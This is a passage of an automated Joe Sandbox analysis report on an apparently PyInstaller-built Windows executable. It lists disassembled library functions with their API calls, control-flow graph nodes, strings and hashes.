                                                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                • API String ID: 4002088556-2863816727
                                                                                                                                                                                                                                                                                • Opcode ID: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                                                • Instruction ID: 2b51c687ba7fa9efcf1a9f2969bb0de15a45b974add65c52cb1c15ae2821de0e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21A811B1D946E1FAF4BB24E8043BAE290BF48755FC08139D54EE61E5EE3CD504D324
                                                                                                                                                                                                                                                                                Function 00007FF7333AC95C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 927 7ff7333ac95c-7ff7333ac982 928 7ff7333ac984-7ff7333ac998 call 7ff7333a5e28 call 7ff7333a5e48 927->928 929 7ff7333ac99d-7ff7333ac9a1 927->929 945 7ff7333acd8e 928->945 931 7ff7333acd77-7ff7333acd83 call 7ff7333a5e28 call 7ff7333a5e48 929->931 932 7ff7333ac9a7-7ff7333ac9ae 929->932 951 7ff7333acd89 call 7ff7333ab824 931->951 932->931 934 7ff7333ac9b4-7ff7333ac9e2 932->934 934->931 937 7ff7333ac9e8-7ff7333ac9ef 934->937 940 7ff7333ac9f1-7ff7333aca03 call 7ff7333a5e28 call 7ff7333a5e48 937->940 941 7ff7333aca08-7ff7333aca0b 937->941 940->951 943 7ff7333aca11-7ff7333aca17 941->943 944 7ff7333acd73-7ff7333acd75 941->944 943->944 949 7ff7333aca1d-7ff7333aca20 943->949 948 7ff7333acd91-7ff7333acda8 944->948 945->948 949->940 952 7ff7333aca22-7ff7333aca47 949->952 951->945 955 7ff7333aca49-7ff7333aca4b 952->955 956 7ff7333aca7a-7ff7333aca81 952->956 958 7ff7333aca72-7ff7333aca78 955->958 959 7ff7333aca4d-7ff7333aca54 955->959 960 7ff7333aca56-7ff7333aca6d call 7ff7333a5e28 call 7ff7333a5e48 call 7ff7333ab824 956->960 961 7ff7333aca83-7ff7333acaab call 7ff7333ae6c4 call 7ff7333ab464 * 2 956->961 963 7ff7333acaf8-7ff7333acb0f 958->963 959->958 959->960 992 7ff7333acc00 960->992 988 7ff7333acac8-7ff7333acaf3 call 7ff7333ad184 961->988 989 7ff7333acaad-7ff7333acac3 call 7ff7333a5e48 call 7ff7333a5e28 961->989 967 7ff7333acb11-7ff7333acb19 963->967 968 7ff7333acb8a-7ff7333acb94 call 7ff7333b4b8c 963->968 967->968 972 7ff7333acb1b-7ff7333acb1d 967->972 980 7ff7333acb9a-7ff7333acbaf 968->980 981 7ff7333acc1e 968->981 972->968 973 7ff7333acb1f-7ff7333acb35 972->973 973->968 977 7ff7333acb37-7ff7333acb43 973->977 977->968 982 7ff7333acb45-7ff7333acb47 977->982 980->981 986 7ff7333acbb1-7ff7333acbc3 GetConsoleMode 980->986 984 7ff7333acc23-7ff7333acc43 ReadFile 981->984 982->968 987 7ff7333acb49-7ff7333acb61 982->987 990 7ff7333acc49-7ff7333acc51 984->990 991 7ff7333acd3d-7ff7333acd46 GetLastError 984->991 986->981 993 7ff7333acbc5-7ff7333acbcd 986->993 987->968 997 7ff7333acb63-7ff7333acb6f 987->997 988->963 989->992 990->991 999 7ff7333acc57 990->999 994 7ff7333acd63-7ff7333acd66 991->994 995 7ff7333acd48-7ff7333acd5e call 7ff7333a5e48 call 7ff7333a5e28 991->995 996 7ff7333acc03-7ff7333acc0d call 7ff7333ab464 992->996 993->984 1001 7ff7333acbcf-7ff7333acbf1 ReadConsoleW 993->1001 1005 7ff7333acbf9-7ff7333acbfb call 7ff7333a5dbc 994->1005 1006 7ff7333acd6c-7ff7333acd6e 994->1006 995->992 996->948 997->968 1004 7ff7333acb71-7ff7333acb73 997->1004 1008 7ff7333acc5e-7ff7333acc73 999->1008 1010 7ff7333acc12-7ff7333acc1c 1001->1010 1011 7ff7333acbf3 GetLastError 1001->1011 1004->968 1015 7ff7333acb75-7ff7333acb85 1004->1015 1005->992 1006->996 1008->996 1017 7ff7333acc75-7ff7333acc80 1008->1017 1010->1008 1011->1005 1015->968 1020 7ff7333acc82-7ff7333acc9b call 7ff7333ac574 1017->1020 1021 7ff7333acca7-7ff7333accaf 1017->1021 1029 7ff7333acca0-7ff7333acca2 1020->1029 1022 7ff7333accb1-7ff7333accc3 1021->1022 1023 7ff7333acd2b-7ff7333acd38 call 7ff7333ac3b4 1021->1023 1026 7ff7333accc5 1022->1026 1027 7ff7333acd1e-7ff7333acd26 1022->1027 1023->1029 1030 7ff7333accca-7ff7333accd1 1026->1030 1027->996 1029->996 1032 7ff7333accd3-7ff7333accd7 1030->1032 1033 7ff7333acd0d-7ff7333acd18 1030->1033 1034 7ff7333accf3 1032->1034 1035 7ff7333accd9-7ff7333acce0 1032->1035 1033->1027 1037 7ff7333accf9-7ff7333acd09 1034->1037 1035->1034 1036 7ff7333acce2-7ff7333acce6 1035->1036 1036->1034 1038 7ff7333acce8-7ff7333accf1 1036->1038 1037->1030 1039 7ff7333acd0b 1037->1039 1038->1037 1039->1027
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                                                • Instruction ID: 745e85b23fc6311122dd17886565fed9b1b60e74529c004fa30aa9d9f0010372
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88C1E73290C78271E7B1AB1990442BDFBA0FF81B80FD58139DA6E63791CE7DE445A760
                                                                                                                                                                                                                                                                                Function 00007FF733397BB0 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                • Opcode ID: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                                                • Instruction ID: 04e82fe40d00ed7fd20e87ab85519967e73d4219148647cf28ceacf57547ba37
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91217931A0CA4291EBA0AB59F44067AF3A1FF857E0F908239E66C53AE4DF7CD5459B10
                                                                                                                                                                                                                                                                                Function 00007FF7333985C0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetCurrentProcess.KERNEL32 ref: 00007FF733397BD0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: OpenProcessToken.ADVAPI32 ref: 00007FF733397BE3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetTokenInformation.KERNELBASE ref: 00007FF733397C08
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetLastError.KERNEL32 ref: 00007FF733397C12
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: GetTokenInformation.KERNELBASE ref: 00007FF733397C52
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF733397C6E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397BB0: CloseHandle.KERNEL32 ref: 00007FF733397C86
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00007FF733393099), ref: 00007FF73339864C
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF733398655
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                • Opcode ID: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                                                • Instruction ID: c07713477eb6f86c7b352283a97cc615235c782a3eaa1b3554b24286b8b3447a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02215E21A08746E2F6A4BB50E4153FAB365EF88780FC48039EA4D67796DF3CD944A760
                                                                                                                                                                                                                                                                                Function 00007FF733397260 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7333928EC,FFFFFFFF,00000000,00007FF73339336A), ref: 00007FF733397372
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                                • Opcode ID: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                                                • Instruction ID: 4c98dd935906a5c8374685724435543852a434541c462b9502c65bfe037dbcbf
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31FA2171DAC1E5FAB1AB20E4503EAA358EB88BE0F808234EE9D537C9DE3CD5059710
                                                                                                                                                                                                                                                                                Function 00007FF7333ADE60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333ADE4B), ref: 00007FF7333ADF7C
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333ADE4B), ref: 00007FF7333AE007
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                • Opcode ID: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                                                • Instruction ID: 1b3a8ab2f18e617455ce5b354495c4b0f5a17f7e344fea31bcc4717a08b232dc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D91B632E19652A5F7B0EF6594502BDABA0BB44B88F94813DDE1E77694CE3CD481E320
                                                                                                                                                                                                                                                                                Function 00007FF7333B0BFC Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                • Opcode ID: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                                                • Instruction ID: 589b834d465d370d583831f45fe310505fb3b9335d21e7f309d2f3edefa96145
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1510772F081159AEB74EF24D9516FCB761AB00399F90823DDE1EA2AE5DF3CA441D710
                                                                                                                                                                                                                                                                                Function 00007FF7333A6738 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                                • Opcode ID: 77215611d5833cc4261aa3ce6efef3cbe316a0555a56b2abfd6bea145bf69a9d
                                                                                                                                                                                                                                                                                • Instruction ID: b5c795bd75dfa8c55f52c8f0a62768468fc93f07af9b4685d84a60d4b0c30622
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77215611d5833cc4261aa3ce6efef3cbe316a0555a56b2abfd6bea145bf69a9d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C351AE22E086419AF7A4EF71D4503BDB3A9EF48B89F90813CDE2D67689DF38D4419320
                                                                                                                                                                                                                                                                                Function 00007FF7333A65E4 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                • Opcode ID: 6ce4c88b6d2478032947ca8abe21e63121e2028da5231a2800b2a2486ebac064
                                                                                                                                                                                                                                                                                • Instruction ID: df8b06ccf64a5bb3f5c7e660e0b86c677f14a3746666f768d2dcfa957fdba434
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce4c88b6d2478032947ca8abe21e63121e2028da5231a2800b2a2486ebac064
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F41B322D1878293E7A4AF2195103B9B260FB94364F40D338E6AC13AE5DF7CA1E09720
                                                                                                                                                                                                                                                                                Function 00007FF7333AA968 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                • Opcode ID: 823bef23182f8f61d7efa7880482c28a4a7867c446eada0463010af46261c3c5
                                                                                                                                                                                                                                                                                • Instruction ID: 45e492b5403185f0bcba1ba76d42509889f86b496a6e4e6318922d0e21ad4f2f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823bef23182f8f61d7efa7880482c28a4a7867c446eada0463010af46261c3c5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D09211F0C68A66EAF83F705C99279A2515F8C711F81A83CC89F263A3CD3DE8496720
                                                                                                                                                                                                                                                                                Function 00007FF73339F694 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 141dc46c6224036006d776e19841065f05dd1418e65b387591b1a003cf84bd0f
                                                                                                                                                                                                                                                                                • Instruction ID: f4555258732f5a2ba0498aeb8a6e9eac17f319025d6e4238546c74b996ef004f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 141dc46c6224036006d776e19841065f05dd1418e65b387591b1a003cf84bd0f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451DB22B0D242E6F7F4B9259800779A291BF44BA6F94C738DD7D277D5CE3CD411A620
                                                                                                                                                                                                                                                                                Function 00007FF73339C1FC Relevance: 3.1, APIs: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
